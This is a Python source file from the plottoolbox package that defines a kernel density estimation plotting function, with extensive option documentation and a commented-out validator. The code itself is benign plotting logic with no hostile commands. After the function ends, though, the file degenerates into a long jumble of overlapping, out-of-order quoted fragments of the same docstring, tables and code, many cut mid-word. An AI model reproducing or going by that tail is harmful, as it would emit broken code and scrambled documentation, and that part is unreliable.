        The "ieee" style is appropriate for black, white, and gray,
        however the "ieee" style also will change the chart size to
        fit in a column of the "IEEE" journal.  The "grayscale" style
        is another style useful for photo-copyable black, white, and
        gray plots.

        Matplotlib styles:
        https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html

        SciencePlots styles:
        https://github.com/garrettj403/SciencePlots
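        A hedged example of style layering (the file name is an
        assumption): later styles override earlier ones, so "ieee"
        here overrides the colors and shrinks the figure after
        "ggplot" has set everything else::

            plottoolbox kde --plot_styles 'ggplot,ieee' < data.csv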
    hlines_y:
        [optional, defaults to None]

        Number or list of y values where to place a horizontal line.
    hlines_xmin:
        [optional, defaults to None]

        List of minimum x values to start the horizontal line.  If a
        list, it must be the same length as `hlines_y`.  If a single
        number, it will be used as the minimum x value for all
        horizontal lines.  A missing value or None will start at the
        minimum x value for the entire plot.
    hlines_xmax:
        [optional, defaults to None]

        List of maximum x values to end each horizontal line.  If a
        list, it must be the same length as `hlines_y`.  If a single
        number, it will be the maximum x value for all horizontal
        lines.  A missing value or None will end at the maximum x
        value for the entire plot.
    hlines_colors:
        [optional, defaults to None]

        List of colors for the horizontal lines.  If a single color,
        it will be used as the color for all horizontal lines.  If a
        list, it must be the same length as `hlines_y`.  If None, will
        take from the color palette in the current plot style.
    hlines_linestyles:
        [optional, defaults to None]

        List of linestyles for the horizontal lines.  If a single
        linestyle, it will be used as the linestyle for all horizontal
        lines.  If a list, it must be the same length as `hlines_y`.
        If None, will take from the standard linestyles list.
    vlines_x:
        [optional, defaults to None]

        List of x values where to place a vertical line.
    vlines_ymin:
        [optional, defaults to None]

        List of minimum y values to start the vertical line.  If a
        list, it must be the same length as `vlines_x`.  If a single
        number, it will be used as the minimum y value for all
        vertical lines.  A missing value or None will start at the
        minimum y value for the entire plot.
    vlines_ymax:
        [optional, defaults to None]

        List of maximum y values to end each vertical line.  If a
        list, it must be the same length as `vlines_x`.  If a single
        number, it will be the maximum y value for all vertical
        lines.  A missing value or None will end at the maximum y
        value for the entire plot.
    vlines_colors:
        [optional, defaults to None]

        List of colors for the vertical lines.  If a single color, it
        will be used as the color for all vertical lines.  If a list,
        it must be the same length as `vlines_x`.  If None, will take
        from the color palette in the current plot style.
    vlines_linestyles:
        [optional, defaults to None]

        List of linestyles for the vertical lines.  If a single
        linestyle, it will be used as the linestyle for all vertical
        lines.  If a list, it must be the same length as `vlines_x`.
        If None, will take from the standard linestyles list.
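        A hedged sketch combining the horizontal and vertical line
        options (the values and file name are assumptions).  The
        single vertical line takes its y limits from the plot because
        `vlines_ymin` and `vlines_ymax` are omitted::

            plottoolbox kde --hlines_y '0.1,0.5' \
                --hlines_colors 'red,blue' --vlines_x 10 < data.csv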
    """
    plt = kde(
        input_ts=input_ts, columns=columns, start_date=start_date,
        end_date=end_date, clean=clean, skiprows=skiprows,
        index_type=index_type, names=names, ofilename=ofilename,
        xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize,
        legend=legend, legend_names=legend_names, subplots=subplots,
        sharex=sharex, sharey=sharey, colors=colors,
        linestyles=linestyles, markerstyles=markerstyles,
        bar_hatchstyles=bar_hatchstyles, style=style, logx=logx,
        logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim,
        secondary_y=secondary_y, mark_right=mark_right,
        scatter_matrix_diagonal=scatter_matrix_diagonal,
        bootstrap_size=bootstrap_size,
        bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis,
        norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis,
        lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line,
        grid=grid, label_rotation=label_rotation,
        label_skip=label_skip, force_freq=force_freq,
        drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis,
        invert_yaxis=invert_yaxis, round_index=round_index,
        plotting_position=plotting_position,
        prob_plot_sort_values=prob_plot_sort_values,
        source_units=source_units, target_units=target_units,
        lag_plot_lag=lag_plot_lag, plot_styles=plot_styles,
        hlines_y=hlines_y, hlines_xmin=hlines_xmin,
        hlines_xmax=hlines_xmax, hlines_colors=hlines_colors,
        hlines_linestyles=hlines_linestyles, vlines_x=vlines_x,
        vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax,
        vlines_colors=vlines_colors,
        vlines_linestyles=vlines_linestyles,
    )


# @tsutils.validator(
#     ofilename=[str, ["pass", []], 1],
#     type=[str, ["domain", ["kde"]], 1],
#     lag_plot_lag=[int, ["range", [1, None]], 1],
#     xtitle=[str, ["pass", []], 1],
#     ytitle=[str, ["pass", []], 1],
#     title=[str, ["pass", []], 1],
#     figsize=[float, ["range", [0, None]], 2],
#     legend=[bool, ["domain", [True, False]], 1],
#     legend_names=[str, ["pass", []], 1],
#     subplots=[bool, ["domain", [True, False]], 1],
#     sharex=[bool, ["domain", [True, False]], 1],
#     sharey=[bool, ["domain", [True, False]], 1],
#     colors=[str, ["pass", []], None],
#     linestyles=[str, ["domain", ["auto", None, "", " ", "  "] + plotutils.LINE_LIST], None],
#     markerstyles=[str, ["domain", ["auto", None, "", " ", "  "] + plotutils.MARKER_LIST], None],
#     bar_hatchstyles=[str, ["domain", ["auto", None, "", " ", "  "] + plotutils.HATCH_LIST], None],
#     style=[str, ["pass", []], None],
#     xlim=[float, ["pass", []], 2],
#     ylim=[float, ["pass", []], 2],
#     secondary_y=[bool, ["domain", [True, False]], 1],
#     mark_right=[bool, ["domain", [True, False]], 1],
#     scatter_matrix_diagonal=[str, ["domain", ["kde", "hist"]], 1],
#     bootstrap_size=[int, ["range", [0, None]], 1],
#     xy_match_line=[str, ["pass", []], 1],
#     grid=[bool, ["domain", [True, False]], 1],
#     label_rotation=[float, ["pass", []], 1],
#     label_skip=[int, ["range", [1, None]], 1],
#     drawstyle=[str, ["pass", []], 1],
#     por=[bool, ["domain", [True, False]], 1],
#     invert_xaxis=[bool, ["domain", [True, False]], 1],
#     invert_yaxis=[bool, ["domain", [True, False]], 1],
#     plotting_position=[str, ["domain", ["weibull", "benard", "tukey", "gumbel", "hazen", "cunnane", "california"]], 1],
#     prob_plot_sort_values=[str, ["domain", ["ascending", "descending"]], 1],
#     plot_styles=[str, ["domain", ["classic", "Solarize_Light2", "bmh", "dark_background", "fast", "fivethirtyeight", "ggplot", "grayscale", "seaborn", "seaborn-bright", "seaborn-colorblind", "seaborn-dark", "seaborn-dark-palette", "seaborn-darkgrid", "seaborn-deep", "seaborn-muted", "seaborn-notebook", "seaborn-paper", "seaborn-pastel", "seaborn-poster", "seaborn-talk", "seaborn-ticks", "seaborn-white", "seaborn-whitegrid", "tableau-colorblind10", "science", "grid", "ieee", "scatter", "notebook", "high-vis", "bright", "vibrant", "muted", "retro"]], None],
#     hlines_y=[float, ["pass", []], None],
#     hlines_xmin=[float, ["pass", []], None],
#     hlines_xmax=[float, ["pass", []], None],
#     hlines_colors=[str, ["pass", []], None],
#     hlines_linestyles=[str, ["domain", ["auto", None, "", " ", "  "] + plotutils.LINE_LIST], None],
#     vlines_x=[float, ["pass", []], None],
#     vlines_ymin=[float, ["pass", []], None],
#     vlines_ymax=[float, ["pass", []], None],
#     vlines_colors=[str, ["pass", []], None],
#     vlines_linestyles=[str, ["domain", ["auto", None, "", " ", "  "] + plotutils.LINE_LIST], None],
# )
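# A hedged usage sketch, not part of the original module: the Python
# API mirrors the CLI options one-to-one, and with `ofilename=None` the
# function returns the Matplotlib `plt` module for further
# customization (the module path below is an assumption), e.g.
#
#     from plottoolbox.functions.kde import kde
#     plt = kde(input_ts="data.csv", ofilename=None)
#     plt.savefig("kde.png", dpi=300)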
def kde(
    input_ts="-", columns=None, start_date=None, end_date=None,
    clean=False, skiprows=None, index_type="datetime", names=None,
    ofilename="plot.png", xtitle="", ytitle="", title="",
    figsize="10,6.0", legend=None, legend_names=None, subplots=False,
    sharex=True, sharey=False, colors="auto", linestyles="auto",
    markerstyles=" ", bar_hatchstyles="auto", style="auto", logx=False,
    logy=False, xaxis="arithmetic", yaxis="arithmetic", xlim=None,
    ylim=None, secondary_y=False, mark_right=True,
    scatter_matrix_diagonal="kde", bootstrap_size=50,
    bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False,
    lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line="",
    grid=False, label_rotation=None, label_skip=1, force_freq=None,
    drawstyle="default", por=False, invert_xaxis=False,
    invert_yaxis=False, round_index=None, plotting_position="weibull",
    prob_plot_sort_values="descending", source_units=None,
    target_units=None, lag_plot_lag=1, plot_styles="bright",
    hlines_y=None, hlines_xmin=None, hlines_xmax=None,
    hlines_colors=None, hlines_linestyles="-", vlines_x=None,
    vlines_ymin=None, vlines_ymax=None, vlines_colors=None,
    vlines_linestyles="-",
    **kwds,
):
    r"""Plot data."""
    # Work around some old option defaults with the implementation of
    # mando: an empty string, "True", or None all mean "show legend".
    legend = bool(legend == "" or legend == "True" or legend is None)

    type = "kde"

    import matplotlib

    matplotlib.use("Agg")
    import matplotlib.pyplot as plt
    from matplotlib.ticker import FixedLocator  # noqa: F401

    tsd = tsutils.common_kwds(
        input_ts, skiprows=skiprows, names=names, index_type=index_type,
        start_date=start_date, end_date=end_date, pick=columns,
        round_index=round_index, dropna="all", source_units=source_units,
        target_units=target_units, clean=clean, por=por,
    )

    tsd, lnames = plotutils.check(type, tsd, legend_names)

    # This is to help pretty print the frequency.
    try:
        try:
            pltfreq = str(tsd.index.freq, "utf-8").lower()
        except TypeError:
            pltfreq = str(tsd.index.freq).lower()
        if pltfreq.split(" ")[0][1:] == "1":
            beginstr = 3
        else:
            beginstr = 1
        if pltfreq == "none":
            short_freq = ""
        else:
            # Short freq string: (day) OR (2 day)
            short_freq = "({})".format(pltfreq[beginstr:-1])
    except AttributeError:
        short_freq = ""

    if colors == "auto":
        colors = None
    else:
        colors = tsutils.make_list(colors)

    if linestyles == "auto":
        linestyles = plotutils.LINE_LIST
    else:
        linestyles = tsutils.make_list(linestyles)

    if bar_hatchstyles == "auto":
        bar_hatchstyles = plotutils.HATCH_LIST
    else:
        bar_hatchstyles = tsutils.make_list(bar_hatchstyles)

    if markerstyles == "auto":
        markerstyles = plotutils.MARKER_LIST
    else:
        markerstyles = tsutils.make_list(markerstyles)
        if markerstyles is None:
            markerstyles = " "

    if style != "auto":
        nstyle = tsutils.make_list(style)
        if len(nstyle) != len(tsd.columns):
            raise ValueError(
                tsutils.error_wrapper(
                    """
You have to have the same number of style strings as time-series to
plot.  You supplied '{}' for style which has {} style strings, but you
have {} time-series.
""".format(
                        style, len(nstyle), len(tsd.columns)
                    )
                )
            )
        # Split each 'ColorMarkerLine' style string into its parts.
        colors = []
        markerstyles = []
        linestyles = []
        for st in nstyle:
            colors.append(st[0])
            if len(st) == 1:
                markerstyles.append(" ")
                linestyles.append("-")
                continue
            if st[1] in plotutils.MARKER_LIST:
                markerstyles.append(st[1])
                try:
                    linestyles.append(st[2:])
                except IndexError:
                    linestyles.append(" ")
            else:
                markerstyles.append(" ")
                linestyles.append(st[1:])

    if linestyles is None:
        linestyles = [" "]
    else:
        linestyles = [" " if i in ["  ", None] else i for i in linestyles]
    markerstyles = [" " if i is None else i for i in markerstyles]

    if colors is not None:
        icolors = itertools.cycle(colors)
    else:
        icolors = None
    imarkerstyles = itertools.cycle(markerstyles)
    ilinestyles = itertools.cycle(linestyles)

    # Only used for bar, barh, bar_stacked, and barh_stacked.
    ibar_hatchstyles = itertools.cycle(bar_hatchstyles)

    if (
        logx is True
        or logy is True
        or norm_xaxis is True
        or norm_yaxis is True
        or lognorm_xaxis is True
        or lognorm_yaxis is True
    ):
        warnings.warn(
            """
*
*   The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis,
*   and --lognorm_yaxis options are deprecated.
*
*   For --logx use --xaxis="log"
*   For --logy use --yaxis="log"
*   For --norm_xaxis use --type="norm_xaxis"
*   For --norm_yaxis use --type="norm_yaxis"
*   For --lognorm_xaxis use --type="lognorm_xaxis"
*   For --lognorm_yaxis use --type="lognorm_yaxis"
*
"""
        )

    if xaxis == "log":
        logx = True
    if yaxis == "log":
        logy = True

    xlim = plotutils.know_your_limits(xlim, axis=xaxis)
    ylim = plotutils.know_your_limits(ylim, axis=yaxis)

    # Resolve style names to bundled SciencePlots files where available.
    plot_styles = tsutils.make_list(plot_styles) + ["no-latex"]
    style_loc = os.path.join(
        os.path.dirname(__file__), os.pardir, "SciencePlots_styles"
    )
    plot_styles = [
        os.path.join(style_loc, i + ".mplstyle")
        if os.path.exists(os.path.join(style_loc, i + ".mplstyle"))
        else i
        for i in plot_styles
    ]
    plt.style.use(plot_styles)

    figsize = tsutils.make_list(figsize, n=2)
    _, ax = plt.subplots(figsize=figsize)

    if type in ["kde", "probability_density"]:
        ax = tsd.plot.kde(
            legend=legend,
            subplots=subplots,
            sharex=sharex,
            sharey=sharey,
            style=None,
            logx=logx,
            logy=logy,
            xlim=xlim,
            ylim=ylim,
            secondary_y=secondary_y,
            figsize=figsize,
        )
        for index, line in enumerate(ax.lines):
            if icolors is not None:
                c = next(icolors)
            else:
                c = None
            if imarkerstyles is not None:
                m = next(imarkerstyles)
            else:
                m = None
            if ilinestyles is not None:
                l = next(ilinestyles)
            else:
                l = None
            if c is not None:
                plt.setp(line, color=c)
            plt.setp(line, marker=m)
            plt.setp(line, linestyle=l)
        ytitle = ytitle or "Density"
        if legend is True:
            plt.legend(loc="best")

    if hlines_y is not None:
        hlines_y = tsutils.make_list(hlines_y)
        hlines_xmin = tsutils.make_list(hlines_xmin)
        hlines_xmax = tsutils.make_list(hlines_xmax)
        hlines_colors = tsutils.make_list(hlines_colors)
        hlines_linestyles = tsutils.make_list(hlines_linestyles)
        nxlim = ax.get_xlim()
        if hlines_xmin is None:
            hlines_xmin = nxlim[0]
        if hlines_xmax is None:
            hlines_xmax = nxlim[1]

    if vlines_x is not None:
        vlines_x = tsutils.make_list(vlines_x)
        vlines_ymin = tsutils.make_list(vlines_ymin)
        vlines_ymax = tsutils.make_list(vlines_ymax)
        vlines_colors = tsutils.make_list(vlines_colors)
        vlines_linestyles = tsutils.make_list(vlines_linestyles)
        nylim = ax.get_ylim()
        if vlines_ymin is None:
            vlines_ymin = nylim[0]
        if vlines_ymax is None:
            vlines_ymax = nylim[1]

    # Note: `type` is fixed to "kde" above, so this block (and the
    # `ppf` transform for the probability axes) is never reached here;
    # it appears to be shared boilerplate with the other plot
    # functions in this package.
    if type in [
        "time",
        "xy",
        "bar",
        "bar_stacked",
        "histogram",
        "norm_xaxis",
        "lognorm_xaxis",
        "weibull_xaxis",
        "norm_yaxis",
        "lognorm_yaxis",
        "weibull_yaxis",
    ]:
        if hlines_y is not None:
            if type in ["norm_yaxis", "lognorm_yaxis", "weibull_yaxis"]:
                hlines_y = ppf(tsutils.make_list(hlines_y))
            plt.hlines(
                hlines_y,
                hlines_xmin,
                hlines_xmax,
                colors=hlines_colors,
                linestyles=hlines_linestyles,
            )
        if vlines_x is not None:
            if type in ["norm_xaxis", "lognorm_xaxis", "weibull_xaxis"]:
                vlines_x = ppf(tsutils.make_list(vlines_x))
            plt.vlines(
                vlines_x,
                vlines_ymin,
                vlines_ymax,
                colors=vlines_colors,
                linestyles=vlines_linestyles,
            )

    plt.xlabel(xtitle)
    plt.ylabel(ytitle)

    if invert_xaxis is True:
        plt.gca().invert_xaxis()
    if invert_yaxis is True:
        plt.gca().invert_yaxis()

    plt.grid(grid)
    plt.title(title)
    plt.tight_layout()
    if ofilename is not None:
        plt.savefig(ofilename)
    return plt
lag_plot_lag [optional, default", "linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None,", "| +-----------------+-------------------+ | o | small circle | +-----------------+-------------------+ |", "is \"default\"] Set the style of the plot. One or", "of maximum x values to end each vertical line. If", "use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis", "colors in the chosen style. At the command line supply", "# figsize=[float, [\"range\", [0, None]], 2], # legend=[bool, [\"domain\", [True,", "be used as the color for all vertical lines. If", "use --xaxis=\"log\" * For --logy use --yaxis=\"log\" * For --norm_xaxis", "= tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin", "combine codes in 'ColorMarkerLine' order, for example 'r*--' is a", "por=por, ) tsd, lnames = plotutils.check(type, tsd, legend_names) # This", "\" if i is None else i for i in", "c = next(icolors) else: c = None if imarkerstyles is", "vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax is None:", ": int [optional] Skip for major labels for bar plots.", "= [] linestyles = [] for st in nstyle: colors.append(st[0])", "x | x | +-------+----------------+ | D | diamond |", "0 is white an 1 is black. 4. Any of", "# [ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\",", "value to last good value. Strips NANs from beginning and", "is None] Still available, but if None is replaced by", "subplots [optional, defaults to False] Make separate subplots for each", "lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional, default is", "y. Set to a line style code. grid [optional, default", "\"bright\", # \"vibrant\", # \"muted\", # \"retro\", # ], #", "for the entire plot. vlines_ymax: [optional, defaults to None] List", "grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\",", "= plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\":", "\"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\",", "linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None:", "hatch types. Otherwise on the command line a comma separated", "# \"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\", # \"scatter\",", "None else: colors = tsutils.make_list(colors) if linestyles == \"auto\": linestyles", "also will change the chart size to fit in a", "lines. If a single color then will be used as", "+======+=========+ | b | blue | +------+---------+ | g |", "\"\", \" \", \" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str,", "O | large circle | +-----------------+-------------------+ | . | dots", "\"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all styles that", "hatching | +-----------------+-------------------+ | ``\\`` | back diagonal | +-----------------+-------------------+", "if pltfreq == \"none\": short_freq = \"\" else: # short", "\"vibrant\", and \"muted\" are all styles that are setup to", "= [] markerstyles = [] linestyles = [] for st", "weibull_yaxis. 
{columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units}", "\"california\"], # ], # 1, # ], # prob_plot_sort_values=[str, [\"domain\",", "# xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\",", "+-------+----------------+ | ``*`` | star | +-------+----------------+ | h |", "crossed | +-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+", "plot in inches. legend [optional, defaults to True] Whether to", "will create a PNG file. If used within Python, and", "norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional,", "vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []], None], #", "code. grid [optional, default is False] Whether to plot grid", "absolute_import, division, print_function import itertools import os import warnings import", "| draw nothing | +---------+--------------+ | '' | draw nothing", "[ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\"))", "vlines_x: [optional, defaults to None] List of x values where", "norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle,", "| triangle up | +-------+----------------+ | < | triangle left", "icolors = itertools.cycle(colors) else: icolors = None imarkerstyles = itertools.cycle(markerstyles)", "to True] Whether to display the legend. legend_names : str", "'--xlim 1,1000' would limit the plot from 1 to 1000,", "along the diagonal. One of 'kde' for Kernel Density Estimation", "[\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str,", "False] Invert the x-axis. invert_yaxis [optional, default is False] Invert", "None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\",", "for example 'filename.png' will create a PNG file. If used", "[optional, defaults to None] List of linestyles for the horizontal", "3. Number between 0 and 1 that represents the level", "nothing | +-------+----------------+ | ' ' | nothing | +-------+----------------+", "share y axis. colors [optional, default is 'auto'] The default", "yellow | +------+---------+ | k | black | +------+---------+ 3.", "1], # xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True,", "legend == \"True\" or legend is None) type = \"kde\"", "| red | +------+---------+ | c | cyan | +------+---------+", "+-----------------+-------------------+ | . | dots | +-----------------+-------------------+ | * |", "0 and 1 that represents the level of gray, where", "each vertical line. If a list must be same length", "--logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are deprecated.", "for i in plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2)", "| h | hexagon1 | +-------+----------------+ | H | hexagon2", "[optional, default is 'arithmetic'] Defines the type of the yaxis.", "for backward-compatibility. 
ACCEPTS:: ['default' | 'steps' | 'steps-pre' | 'steps-mid'", "# @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\",", "vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, )", "# subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\", [True,", "fit in a column of the \"IEEE\" journal. The \"grayscale\"", "+ [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles", "| +-------+----------------+ | x | x | +-------+----------------+ | D", "\"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\",", "itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar, barh, bar_stacked,", "| c | cyan | +------+---------+ | m | magenta", "= tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin is None: vlines_ymin", "is False] Invert the y-axis. plotting_position : str [optional, default", "to end each horizontal line. If a list must be", "+------------------+ | HTML Color Names | +==================+ | red |", "strings if using the Python API. Separated 'colors', 'linestyles', and", "or lognorm_xaxis is True or lognorm_yaxis is True ): warnings.warn(", "``+`` | plus | +-------+----------------+ | x | x |", "of the plot. One or more of Matplotlib styles \"classic\",", "if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\"", "2 | tri_up | +-------+----------------+ | 3 | tri_left |", "iterate through the available matplotlib marker types. Otherwise on the", "[optional, default is based on range of x values] Comma", "to None] List of x values where to place a", "with star marker. bar_hatchstyles [optional, default to \"auto\", only used", "# vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \"", "`vlines_x`. If a single number will be the maximum x", "| +-------+----------------+ | 3 | tri_left | +-------+----------------+ | 4", "not None: l = next(ilinestyles) else: l = None if", "command line a comma separated list, or a list of", "prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[ # str, #", "One of 'arithmetic', 'log'. yaxis : str [optional, default is", "sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False,", "can then be changed or added to as needed. lag_plot_lag", "xtitle : str [optional, default depends on ``type``] Title of", "list of strings for each time-series in the data set.", "of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use", "at the maximum x value for the entire plot. vlines_colors:", "None: c = next(icolors) else: c = None if imarkerstyles", "of plot in inches. legend [optional, defaults to True] Whether", "<filename>src/plottoolbox/functions/kde.py # -*- coding: utf-8 -*- \"\"\"Collection of functions for", "colors for the vertical lines. If a single color then", "+=======+================+ | . | point | +-------+----------------+ | o |", "grid [optional, default is False] Whether to plot grid lines", "'log'. 
yaxis : str [optional, default is 'arithmetic'] Defines the", "\"\"\" You have to have the same number of style", "``type``] Title of x-axis. ytitle : str [optional, default depends", "+-------+----------------+ | '' | nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html", "| +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto']", "the table below. +------+---------+ | Code | Color | +======+=========+", "\"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if colors == \"auto\":", "list of y values where to place a horizontal line.", "\"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", #", "nothing | +-------+----------------+ | '' | nothing | +-------+----------------+ Marker", "diagonal | +-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+ |", "+---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' ']", "and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\",", "standard linestyles list. vlines_x: [optional, defaults to None] List of", "label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\", [1, None]], 1],", "| x | +-------+----------------+ | D | diamond | +-------+----------------+", "1], # label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\", [1,", "+------+---------+ | y | yellow | +------+---------+ | k |", "\"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", #", "[] for st in nstyle: colors.append(st[0]) if len(st) == 1:", "style strings, but you have {} time-series. \"\"\".format( style, len(nstyle),", "column of the \"IEEE\" journal. The \"grayscale\" is another style", "]: if hlines_y is not None: if type in [\"norm_yaxis\",", "vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability density function. \"kde\"", "each time series. sharex [optional, default to True] In case", "\"auto\": colors = None else: colors = tsutils.make_list(colors) if linestyles", "style, len(nstyle), len(tsd.columns) ) ) ) colors = [] markerstyles", "'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis,", "thin diamond | +-------+----------------+ | _ | hlines_y | +-------+----------------+", "Plot from first good value to last good value. Strips", "all vertical lines. A missing value or None will start", "\"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", #", "i is None else i for i in markerstyles] if", "linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if", "used as the color for all vertical lines. If a", "1 that represents the level of gray, where 0 is", "+-------+----------------+ | ``+`` | plus | +-------+----------------+ | x |", "= [\" \" if i is None else i for", "is 'arithmetic'] Defines the type of the xaxis. One of", "!= len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have to have", "for the plot. Extension defines the type, for example 'filename.png'", "# \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\",", "strings, but you have {} time-series. 
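# A minimal usage sketch (illustrative only, not part of the package
# API): exercising the Python-level ``kde`` function defined below with
# a synthetic series.  It assumes the tstoolbox convention that
# ``input_ts`` may be a DataFrame; the column name and option values
# are invented for the example.
def _kde_usage_example():
    import numpy as np
    import pandas as pd

    index = pd.date_range("2000-01-01", periods=365, freq="D")
    series = pd.DataFrame(
        np.random.lognormal(size=365), index=index, columns=["flow"]
    )
    # Per the docstring above, ``ofilename=None`` returns the
    # Matplotlib object so the figure can be changed or added to as
    # needed; ``yaxis="log"`` replaces the deprecated --logy flag.
    return kde(input_ts=series, ofilename=None, yaxis="log")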
\"\"\".format( style, len(nstyle), len(tsd.columns)", "| ``-`` | solid | +---------+--------------+ | -- | dashed", "be same length as `hlines_y`. If a single number will", "replaced by 'colors', 'linestyles', and 'markerstyles' options. Currently the 'style'", "distinguished by someone with color blindness. Black, White, and Gray", "as the minimum x values for all horizontal lines. A", "vertical lines. A missing value or None will end at", "= nxlim[0] if hlines_xmax is None: hlines_xmax = nxlim[1] if", "the plot. See `xlim` for examples. xaxis : str [optional,", "[optional, defaults is ''] Will add a match line where", "as plt from matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds( input_ts,", "lines. If a single linestyle then will be used as", "colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if", "\"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\".", "will iterate through the available matplotlib marker types. Otherwise on", "mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid,", "| ``|`` | vertical | +-----------------+-------------------+ | - | horizontal", "estimation of probability density function. \"kde\" will create a plot", "comma separated list, or a list of strings if using", "to 1000, where '--xlim ,1000' would base the lower limit", "inches. legend [optional, defaults to True] Whether to display the", "\"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", #", "for all vertical lines. If a list must be same", "if invert_yaxis is True: 